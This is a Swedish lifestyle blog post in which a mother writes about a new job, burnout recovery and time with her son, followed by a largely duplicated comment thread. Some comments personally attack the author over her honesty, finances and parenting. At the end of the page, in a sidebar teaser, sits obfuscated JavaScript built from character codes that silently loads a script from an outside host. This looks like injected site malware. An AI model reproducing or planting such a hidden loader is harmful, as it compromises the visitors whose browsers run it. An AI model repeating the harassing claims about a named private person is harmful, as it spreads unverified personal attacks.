Egentid med Lilleman

Hej fina!

Lördag morgon  lunch. Sovmorgon och kaffe på balkongen i solen. Lilleman är som en tonåring och kan sova HUR länge somhelst. hehe! Växer antagligen mer än vanligt. Jag har gått ur Stockholm Beautyweek bubblan, och klivit in i mamma/son bubblan! -UNDERBART!🙌🏻😍

F9E2F112-0EE2-4360-8202-1EA647E84DA5

Efter intensiva dagar, med otroligt många härliga människor med någon form av koppling till skönhetsindustrin så är det välbehövligt. Inte för att det inte är roligt, denna veckan har varit fantastisk. Mer för att min energi då och då tar slut. Men lugn kära du, jag kommer dela med mig om allt och lite till ifrån Beautyweek. Bilder, uppdateringar tips och skönhetsråd ☺️

Jag kommer även att berätta om min nya roll på Lifestyle som är officiellt. Ett jobb som jag har hållt hemligt ett tag. Många ev er vet redan om vad det är, då detta presenterades på scenen under just Stockholm beautyweek. Men jag vill skriva om det själv också såklart….  

-TACK för alla gratulationer och lyckönskningar!!!! (till er som redan känner till detta)🙏🏻🙏🏻🙏🏻

Mitt gamla jag hade suttit uppe på nätterna och bloggat ifatt efter en händelserik vecka som denna. Mitt nya jag, väljer att följa doktorns restrutioner. Går och lägger mig, prioriterar mig själv och min hälsa. Ingenting är viktigare än min Lilleman, utan min hälsa kan jag inte vara den mamman som jag vill vara för honom.

Ibland ”glömmer” jag bort min status, och accelerera för fort igen. De dagar då energin är med mig…  Men då lägger någonting av, kroppen säger ifrån.  För några veckor sedan tappade jag minnet mitt på ljusa dagen. Veckan innan svimmade jag av i duschen (med jonas). Ångesten tar ett stadigt grepp och drar ner mig i mörkret igen. 

Därför är det SÅ viktigt att jag använder behandlingsmetoden och lyssnar på, vad som fungerar bäst för mig.  Jag fungerar inte om jag inte tar saker i MIN takt, som MIN kropp tillåter. Någon skrev här inne gällande min utbrändhet. Tyckte att det var konstigt att jag jobbade. Det där kommer jag att ägna ett helt inlägg åt, när jag får lust. För saken är den att det är individuellt.

När jag var som sjukast, när jag inte kunde röra mig eller komma upp. mitt immunförsvar hade checkat ut sedan länge. Hälsan spökade, in och ut på sjukhus. Operationer och noll immunförsvar som följd.  Då förmådde jag ingenting. Jag trodde att jag skulle dö. Den skräcken och den förtvivlan som jag kände kommer jag aldrig att glömma.

Men efter några månader när jag (även då) i samråd med läkare åt både medicin och försökte att VILA mig frisk. Då blev det ännu värre. depressionen blev ännu djupare och det blev mörkt. Riktigt mörkt.

I mitt fall så behöver jag aktiveras. I början så handlade det om promenader, och att kunna möte mina närmaste, då var det tex mina tidigare grannar (david och julia) bla.

Succesivt så har jag trappat upp det och ibland fått backa tillbaka igen. För ett sedan krypa ut igen. Jag mår inget bra av att ”vila” mig frisk. Jag behöver känna mig behövd, jag behöva fylla en funktion. Jag får ångest direkt när jag inte har en tid att passa, när jag är ensam eller inte har något planerat. Jag kan inte med ord beskriva hur svårt detta är för mig… Att bara vara i nuet, att vara ensam. Det går inte. Det är såklart någonting jag jobbar med, dagligen. Men det är också mitt största utmaning, att BROMSA mig själv, och att lära mig att ”bara vara” .

Jag är och kommer alltid att vara en arbetsnarkoman  Skillnaden är att det är ingenting jag skryter om längre… inte nu, som vuxen och med mina erafarenheter av utmattningsdepression och annat. Men jag tar med mig mitt bagage och det team av läkare/kbt och gör något j*vligt bra utav det. Jag vet att jag kommer ta mig ur detta, starkare, ödmjukare och mer medveten än någonsin. Jag är inte där ännu…. Men jag är närmare idag, än igår👊🏻

Som sagt mer om det i ett eget inlägg gällande psykisk hälsa. Jag jobbar, och jag trivs med det. Jag styr mina tider själv och försöker hålla en bra balans. 

Däremot vill jag ge passa på att ge mina arbetsgivare och kollegor en STOR ELOGE, som trots mitt blottande om min utmattningsdepression och min väg tillbaka ändå valde att satsa på mig och välkomna mig ombord på Lifestyle. Jag tror på ärlighet, och jag vet att en relation som har det förtroendet som jag redan ömsesidigt har med Lifestyle, bara  kan bli bra!🌟🙏🏻

Att jag får jobba med frihet under ansvar, där min hälsa kommer först, gör gott för både mig och företaget. Som sagt…. Mer om det senare. 

Ville egentligen bara kika in och säga hej till er alla här inne.

NU laddar jag om batterierna tillsammans med Ludvig. Igår morse, strax innan 05:00 kom han hem till oss. Vi la oss och sov ett par timmar, sedan  var vi på frukosdejt, han fick följa med till mitt nya jobb  och kontor för att få se vart jag håller hus när jag inte jobbar hemifrån. Han fick båda delägarna att shuffa! haha! (Vågar dock inte lägga upp bild )

Vi avslutade dagen med grillning hemma hos våran vän Korall med familj. Killarna gick på disco, och Ludvig klädde sig som Samir. (hehe! lång tröja osv) Jonas flög iväg på gigg imorse och är hemma först imorgon. Jag och Lilleman sk täta lunch strax, hemma. Innan vi ska åka till Gröna Lund. Bara han och jag.

-SÅ mysigt!!!!!!❤️🙏🏻❤️❤️❤️❤️

Bjuder på några suddiga mobilbilder ifrån gårdagen.

Jag kände mig som en packåsna på bilden nedan. Vårat hem och kylskåp har fått NOLL kärlek av mig på sista tiden, å sthlm beautyweek varit fokus. Det som inte syns på bilden är att jag bär matkassar på min ena arm, haha! Jonas tyckte att vi skulle gå två gånger, jag vägrade! 

B89DE6AD-BCFB-4F03-B573-4BADCC999110 99485715-B875-4C8D-9A40-8854678F1CCA D98A0F88-C885-46CC-B9CF-8178135DB707 3C93F31A-6C65-4A0C-9F51-4C0AC2528675

7CB546BC-AAE1-4092-964A-D8917555E876 B18E5562-B473-4E6C-8D02-9A155DEFFB54

Ännu mer bubbel på bordet. Jag körde som vanligt. Men skålade med alkoholfritt! För igår var ingen vanlig dag, igår släppte våra vänner Enmansarmenkorall sin ep med 5 låtar som jag verkligen tycker att du ska gå in och lyssna på!  😄

Du hittar dom HÄR  🌟🎤🎼 👈🏻

 Hörs senare! Trevlig helg underbara cybervänner!

Kram kram / My Martens 

64 Komentarer

 1. Vilken snygg klänning, på en vacker tjej, vart har du köpt den. .? Jag tycker du verkar vara en bra person, och en fin mamma? jag förstår inte ,så fort du gör något,blir det ett himla liv?
  Jag tycker oftast att du levernet lugnt liv, men hallo, alla människor måste ”väl” få leva livet lite någon gång?
  Jag känner inte dogmen tycker du verkar vara en helt vanlig och snäll trevlig tjej,som gör allt för sin fina lilla pojke?
  Jag önskar dig lycka till med allt i livet, obs jag tycker du och din indianjonas,är så fina tilsammans?
  Solstrålar från norr,som ibland också vill leva livet ?

  • Tack snäll du?? Dina ord betyder jätte mycket….. ❤️ Ja, ibland undrar man vad det är som provocerar egentligen. För
   Det Spelar inte roll vad jag gör ? klänningen är ifrån Café Gårdby på öland. Märket Pulz ? kram

 2. Vilken snygg klänning, på en vacker tjej, vart har du köpt den. .? Jag tycker du verkar vara en bra person, och en fin mamma😘 jag förstår inte ,så fort du gör något,blir det ett himla liv😉
  Jag tycker oftast att du levernet lugnt liv, men hallo, alla människor måste ”väl” få leva livet lite någon gång😉

  Jag känner inte dogmen tycker du verkar vara en helt vanlig och snäll trevlig tjej,som gör allt för sin fina lilla pojke😘

  Jag önskar dig lycka till med allt i livet, obs jag tycker du och din indianjonas,är så fina tilsammans😍

  Solstrålar från norr,som ibland också vill leva livet 😍

  • Tack snäll du🙏🏻 Dina ord betyder jätte mycket….. ❤️ Ja, ibland undrar man vad det är som provocerar egentligen. För
   Det Spelar inte roll vad jag gör 😅 klänningen är ifrån Café Gårdby på öland. Märket Pulz 😃 kram

  • Jag har (precis som jag skrev och skrivit vid flera tillfällen) Valt att pausa min mäklarutbidning. De kurser jag har gjort och tentat av kommer givetvis att tillgodoräknas när jag väljer att sätta igång. Men i min väg tillbaka från utmattningsdeppressionen så behve jag väldigt mycket frihet under andar, dvs minimala tider att passa, dagar som jag kan utgå hemifrån, tid hos läkare och kbt. Det fungerar inte med den branschen, med et fungerar med mitt nya jobb som jag snart ska berätta mer om…

  • Jag har (precis som jag skrev och skrivit vid flera tillfällen) Valt att pausa min mäklarutbidning. De kurser jag har gjort och tentat av kommer givetvis att tillgodoräknas när jag väljer att sätta igång. Men i min väg tillbaka från utmattningsdeppressionen så behve jag väldigt mycket frihet under andar, dvs minimala tider att passa, dagar som jag kan utgå hemifrån, tid hos läkare och kbt. Det fungerar inte med den branschen, med et fungerar med mitt nya jobb som jag snart ska berätta mer om…

 3. All lycka och välgång i ditt nya jobb, hoppas det för dig framåt, varje dag blir du starkare och kommer kunna över bevisa idioterna. Vad fin han är Ludvig, men vill han inte klippa håret med, eller vad vet jag om dagens stil ??

 4. All lycka och välgång i ditt nya jobb, hoppas det för dig framåt, varje dag blir du starkare och kommer kunna över bevisa idioterna. Vad fin han är Ludvig, men vill han inte klippa håret med, eller vad vet jag om dagens stil 👍😍

 5. Ursäkta mig asså… Du skriver :
  Jag tror på ÄRLIGHET, och jag vet att en relation som har det förtroendet som jag redan ömsesidigt har med Lifestyle, bara kan bli bra!???
  Kanske inte kommer från rätt person att atala om örlighet. För är det något du inte har så är det just det! Hoppas du får hjälp med den biten också?!
  https://www.mabra.com/sa-kanner-du-igen-en-mytoman/
  Bra att bloggportalen tagit bort det ordet i din header, beskrivning av dig själv.

    • Du har fel ang din påståenden ang 52 alias. Jag hade 2!! det sista kom från en som logade in på samma dator på jobbet. men om, jag kan ta på mig det och då är vi uppe i 3 (TRE) alias.TRE och inte 53.
     och kom inte mer med osanning om mig/oss att vi anklagat och haft synpunkter ang ditt barn.Det som skrivits är precis samma som så många andra: hur du väljer och hur du tänker när du gör dina val.
     Och lögnerna, om smått o stort. Det är galet…helt urspårat. Läste du artikeln min kollega Katrin skickade med i sitt inlägg?
     jag läste artikeln.
     så är det med det och det och detta skriver jag privat,
     god natt

  • Hahaha redan tillbaks på jobbet? Var de inte nöjda med dina troll dagar här? Nåja, du får väl jobba lite till då o se om du får godkänt den här gången då Maggis ??

 6. Ursäkta mig asså… Du skriver :

  Jag tror på ÄRLIGHET, och jag vet att en relation som har det förtroendet som jag redan ömsesidigt har med Lifestyle, bara kan bli bra!🌟🙏🏻

  Kanske inte kommer från rätt person att atala om örlighet. För är det något du inte har så är det just det! Hoppas du får hjälp med den biten också?!

  https://www.mabra.com/sa-kanner-du-igen-en-mytoman/

  Bra att bloggportalen tagit bort det ordet i din header, beskrivning av dig själv.

    • Du har fel ang din påståenden ang 52 alias. Jag hade 2!! det sista kom från en som logade in på samma dator på jobbet. men om, jag kan ta på mig det och då är vi uppe i 3 (TRE) alias.TRE och inte 53.

     och kom inte mer med osanning om mig/oss att vi anklagat och haft synpunkter ang ditt barn.Det som skrivits är precis samma som så många andra: hur du väljer och hur du tänker när du gör dina val.
     Och lögnerna, om smått o stort. Det är galet…helt urspårat. Läste du artikeln min kollega Katrin skickade med i sitt inlägg?
     jag läste artikeln.

     så är det med det och det och detta skriver jag privat,

     god natt

  • Hahaha redan tillbaks på jobbet? Var de inte nöjda med dina troll dagar här? Nåja, du får väl jobba lite till då o se om du får godkänt den här gången då Maggis 😂😂

 7. Har följt din blogg länge men mest äst kommentarerna, det är så otroligt roligt!!¨
  Du får mest rätt elaka kommentarer och det är ju inte så konstigt. Läste artikeln någon länkat till ang Mytomani. Det berkar ju stämma på pricken. När någon ifrågasätter dig så svara du alltid spydigt, nedlåtande och otrevligt.Men sällan själva svart på frågan. Oftast skiter du i att svara och det antagligen för att du inser själv hur fel du har uttryckt dig, ljugit, blivit genomskådad etc. Kan du någonsin ge ett rakt svar på en rak fråga?
  Vi testar:
  exempel 1: Läser att du har en person med 52 olika alias. Den personen erkänner att hon har 2 eller 3 olika. Ljuger du eller överdriver du med dina 52 st?
  Ex 2:Du skriver att du pausat mäklarutbildningen, vilket inte är sant! En vän går där och klarar man inte av det så får man sluta! Vilket du fick lov att göra. Du har inte pausat hos dem, möjligen kallar du det för att du själv ser det så. Men du klarade inte av tentor o prov och var inte välkommen att fortsätta längre.
  Ex 3:du beklagar dig för din ångest, utmattningsdeppression mm. Då flänger man inte runt som du gör. flyttar hit o dit och varje gån så ör det såååå bra och detta är ditt nya liv du ska börja. Finns INGEN läkare som du säger att du har som skulle tycka att du mår bättre av detta. Att du ibland blir inbjuden på saker är bara för att du måste synas o inte blir bortglömd. Andra skakar på huvudet bakom din rygg. Tragiskt.
  Ex 4: du försummar tid med din son och försöker rättfärdiga det med alla möjliga förklaringar. du tror inte han blir påverkad av ditt ostabila liv? När du väl träffar honom är det så uppenbart att du försöker köpa hans kärlek o tillit till dig. Presenter jämt o ständigt, gör bsrs roliga saker så du tror han blir glad, och det blir han på kort sikt. Tryggheten och rutinerna har han med och hos sin pappa, Med dig lindad runt sitt finger blir det som en pajasshow varenda gång. Sällan jag läst att ni BARA varit själva ’hemma’ i din hyrda lilla stuga.
  Äger du nåt överhuvudtaget? Har du bara spenderat pengarna du tjänat/tjänar?
  Ingen bostad ( äger ingen alltså)
  Leasad bil på avbetalning. Inget investerat som ger trygghet. Ingen buffert. Bara skulder o utgifter….inte ens ett lån får du beviljat.
  Är det inte dax att du sätter dig ner och funderar i vilken ände du ska börja?
  Du är ingen jättepopulär människa eller bloggare. Har du funderat på vad som händer när bloggen börjar tappa följare o intresse?

  • Så jäkla lågt att ge sig på my om hennes son. Denne pojk ser ut att må helt ypperligt! Han lider inte på nåt vis. Finns så fruktansvärt många barn där ute som hade gjort allt för att få vara barn till my. Vad my själv har berättat så är hon ett sk maskros barn. Hon har inte fått den trygghet vi alla borde få o som vi ser som en självklarhet. Med tanke på allt detta så är my en kärleksfull mamma o gör säkert så gott hon kan. Det finns alltid en orsak bakom ett beteende, o om folk slutar att vara så jäkla fördömande emot varann o istället se allt de positiva i människan trots att man gjort dumma val i livet och sårat människor så blir vi mycket större som människor.. Ni elaka troll besitter ingen sympati överhuvudtaget o är mycket mycket små människor. Väx upp för fan nån gång!!

  • Får väl börja ned att lägga till ett A efter mitt namn. Vill definitivt inte förknippas med denna ’Lena’ eller det är möjligtvis Maggis/Johanna/Katrin ?? Namnen börjar bli många nu ?
   Varför går du in på Mys blogg o skriver en massa dynga om du nu tycker att hon är så hemsk ??
   Är det för att trycka ner henne ? Riktigt lågt !!
   Den som mår dåligt är nog du själv ! Rannsaka vad du har skrivit. Så dumma påstående, så klockorna stannar.
   Tvi fan rent ut sagt !
   Kram My ❤️

 8. Har följt din blogg länge men mest äst kommentarerna, det är så otroligt roligt!!¨
  Du får mest rätt elaka kommentarer och det är ju inte så konstigt. Läste artikeln någon länkat till ang Mytomani. Det berkar ju stämma på pricken. När någon ifrågasätter dig så svara du alltid spydigt, nedlåtande och otrevligt.Men sällan själva svart på frågan. Oftast skiter du i att svara och det antagligen för att du inser själv hur fel du har uttryckt dig, ljugit, blivit genomskådad etc. Kan du någonsin ge ett rakt svar på en rak fråga?
  Vi testar:
  exempel 1: Läser att du har en person med 52 olika alias. Den personen erkänner att hon har 2 eller 3 olika. Ljuger du eller överdriver du med dina 52 st?
  Ex 2:Du skriver att du pausat mäklarutbildningen, vilket inte är sant! En vän går där och klarar man inte av det så får man sluta! Vilket du fick lov att göra. Du har inte pausat hos dem, möjligen kallar du det för att du själv ser det så. Men du klarade inte av tentor o prov och var inte välkommen att fortsätta längre.
  Ex 3:du beklagar dig för din ångest, utmattningsdeppression mm. Då flänger man inte runt som du gör. flyttar hit o dit och varje gån så ör det såååå bra och detta är ditt nya liv du ska börja. Finns INGEN läkare som du säger att du har som skulle tycka att du mår bättre av detta. Att du ibland blir inbjuden på saker är bara för att du måste synas o inte blir bortglömd. Andra skakar på huvudet bakom din rygg. Tragiskt.

  Ex 4: du försummar tid med din son och försöker rättfärdiga det med alla möjliga förklaringar. du tror inte han blir påverkad av ditt ostabila liv? När du väl träffar honom är det så uppenbart att du försöker köpa hans kärlek o tillit till dig. Presenter jämt o ständigt, gör bsrs roliga saker så du tror han blir glad, och det blir han på kort sikt. Tryggheten och rutinerna har han med och hos sin pappa, Med dig lindad runt sitt finger blir det som en pajasshow varenda gång. Sällan jag läst att ni BARA varit själva ’hemma’ i din hyrda lilla stuga.

  Äger du nåt överhuvudtaget? Har du bara spenderat pengarna du tjänat/tjänar?
  Ingen bostad ( äger ingen alltså)
  Leasad bil på avbetalning. Inget investerat som ger trygghet. Ingen buffert. Bara skulder o utgifter….inte ens ett lån får du beviljat.
  Är det inte dax att du sätter dig ner och funderar i vilken ände du ska börja?

  Du är ingen jättepopulär människa eller bloggare. Har du funderat på vad som händer när bloggen börjar tappa följare o intresse?

  • Så jäkla lågt att ge sig på my om hennes son. Denne pojk ser ut att må helt ypperligt! Han lider inte på nåt vis. Finns så fruktansvärt många barn där ute som hade gjort allt för att få vara barn till my. Vad my själv har berättat så är hon ett sk maskros barn. Hon har inte fått den trygghet vi alla borde få o som vi ser som en självklarhet. Med tanke på allt detta så är my en kärleksfull mamma o gör säkert så gott hon kan. Det finns alltid en orsak bakom ett beteende, o om folk slutar att vara så jäkla fördömande emot varann o istället se allt de positiva i människan trots att man gjort dumma val i livet och sårat människor så blir vi mycket större som människor.. Ni elaka troll besitter ingen sympati överhuvudtaget o är mycket mycket små människor. Väx upp för fan nån gång!!

  • Får väl börja ned att lägga till ett A efter mitt namn. Vill definitivt inte förknippas med denna ’Lena’ eller det är möjligtvis Maggis/Johanna/Katrin ?? Namnen börjar bli många nu 😂
   Varför går du in på Mys blogg o skriver en massa dynga om du nu tycker att hon är så hemsk ??
   Är det för att trycka ner henne ? Riktigt lågt !!
   Den som mår dåligt är nog du själv ! Rannsaka vad du har skrivit. Så dumma påstående, så klockorna stannar.
   Tvi fan rent ut sagt !

   Kram My ❤️

 9. Kämpa på My❤är oxå sån att jag behöver jobba känna mig behövd!!Att gå ensam hemma ger mig sämre mående!
  Äter du antidepressiva?

 10. Kämpa på My❤är oxå sån att jag behöver jobba känna mig behövd!!Att gå ensam hemma ger mig sämre mående!

 11. Kämpa på My❤är oxå sån att jag behöver jobba känna mig behövd!!Att gå ensam hemma ger mig sämre mående!
  Äter du antidepressiva?

 12. Kämpa på My❤är oxå sån att jag behöver jobba känna mig behövd!!Att gå ensam hemma ger mig sämre mående!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/